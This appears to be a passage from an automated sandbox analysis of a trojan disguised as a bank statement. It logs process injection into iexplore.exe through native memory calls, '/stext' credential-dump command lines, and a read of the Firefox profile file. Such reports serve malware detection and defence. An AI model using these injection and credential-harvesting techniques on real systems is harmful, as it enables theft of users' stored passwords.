Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0057697A 26_2_0057697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00564379 26_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056D382 26_2_0056D382
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00572A7B 26_2_00572A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00569E10 26_2_00569E10
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00563E05 26_2_00563E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005610DE 26_2_005610DE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005730BF 26_2_005730BF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00574D65 26_2_00574D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056A561 26_2_0056A561
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056A1E8 26_2_0056A1E8
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056E1B9 26_2_0056E1B9
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 004146FD appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00443360 appears 37 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00411538 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00442E56 appears 32 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 00414AA6 appears 88 times
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: String function: 0041485E appears 67 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02306439 NtProtectVirtualMemory, 0_2_02306439
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022F3E05 NtWriteVirtualMemory,TerminateProcess, 0_2_022F3E05
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_022FDA66 NtAllocateVirtualMemory,LoadLibraryA, 0_2_022FDA66
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_0230697A NtResumeThread, 0_2_0230697A
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02302A7B NtWriteVirtualMemory, 0_2_02302A7B
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 0_2_02304D65 NtWriteVirtualMemory, 0_2_02304D65
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Users\user\Desktop\Statement from QNB.exe Code function: 4_3_0087A177 NtAllocateVirtualMemory, 4_3_0087A177
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00402CAC NtdllDefWindowProc_A, 14_2_00402CAC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00402D66 NtdllDefWindowProc_A, 14_2_00402D66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF6439 NtProtectVirtualMemory, 15_2_02BF6439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BE3E05 NtWriteVirtualMemory,TerminateProcess, 15_2_02BE3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BEDA66 NtAllocateVirtualMemory,LoadLibraryA, 15_2_02BEDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF697A NtUnmapViewOfSection, 15_2_02BF697A
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF2A7B NtWriteVirtualMemory, 15_2_02BF2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 15_2_02BF4D65 NtWriteVirtualMemory, 15_2_02BF4D65
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00408B60 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary, 17_2_00408B60
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_0040172C NtdllDefWindowProc_A, 18_2_0040172C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 18_2_004017FE NtdllDefWindowProc_A, 18_2_004017FE
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006BDA66 NtAllocateVirtualMemory,LoadLibraryA, 21_2_006BDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C6439 NtProtectVirtualMemory, 21_2_006C6439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006B3E05 NtWriteVirtualMemory,TerminateProcess, 21_2_006B3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C2A7B NtWriteVirtualMemory, 21_2_006C2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 21_2_006C4D65 NtWriteVirtualMemory, 21_2_006C4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CEDA66 NtAllocateVirtualMemory,LoadLibraryA, 22_2_02CEDA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CE3E05 NtWriteVirtualMemory,TerminateProcess, 22_2_02CE3E05
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF6439 NtProtectVirtualMemory, 22_2_02CF6439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF2A7B NtWriteVirtualMemory, 22_2_02CF2A7B
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 22_2_02CF4D65 NtWriteVirtualMemory, 22_2_02CF4D65
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA, 23_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00576439 NtProtectVirtualMemory, 23_2_00576439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_00564379 NtProtectVirtualMemory, 23_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 23_2_005643DF NtProtectVirtualMemory, 23_2_005643DF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA, 25_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00576439 NtProtectVirtualMemory, 25_2_00576439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_00564379 NtProtectVirtualMemory, 25_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 25_2_005643DF NtProtectVirtualMemory, 25_2_005643DF
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_0056DA66 NtAllocateVirtualMemory,LoadLibraryA, 26_2_0056DA66
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00576439 NtProtectVirtualMemory, 26_2_00576439
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_00564379 NtProtectVirtualMemory, 26_2_00564379
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Code function: 26_2_005643DF NtProtectVirtualMemory, 26_2_005643DF
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info
Source: Statement from QNB.exe, 00000000.00000000.80618851300.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
Source: Statement from QNB.exe, 00000004.00000003.81011749898.000000001F3B1000.00000004.00000001.sdmp Binary or memory string: OriginalFilename1.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX vs Statement from QNB.exe
Source: Statement from QNB.exe, 00000004.00000000.80785394197.0000000000421000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
Source: Statement from QNB.exe Binary or memory string: OriginalFilenameEsothyropexy4.exe vs Statement from QNB.exe
Tries to load missing DLLs
Source: C:\Users\user\Desktop\Statement from QNB.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: edgegdi.dll Jump to behavior
Source: Statement from QNB.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Statement from QNB.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exe
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt"
Source: unknown Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt"
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt"
Source: unknown Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe"
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Users\user\Desktop\Statement from QNB.exe "C:\Users\user\Desktop\Statement from QNB.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Users\user\Desktop\Statement from QNB.exe Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss0.txt" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss1.txt" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss2.txt" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss3.txt" Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe /stext "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\nyuimqkss4.txt" Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe Process created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe "C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4.exe" Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 14_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 14_2_00410DE1
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe System information queried: HandleInformation Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File created: C:\Users\user\AppData\Roaming\D7I2A8S6-B3Y1-J1N8-O887-M0I1C4O6V0D4 Jump to behavior
Source: C:\Users\user\Desktop\Statement from QNB.exe File created: C:\Users\user\AppData\Local\Temp\~DFB9E9D901A47CB813.TMP Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/16@5/4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe Code function: 17_2_00416857 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 17_2_00416857
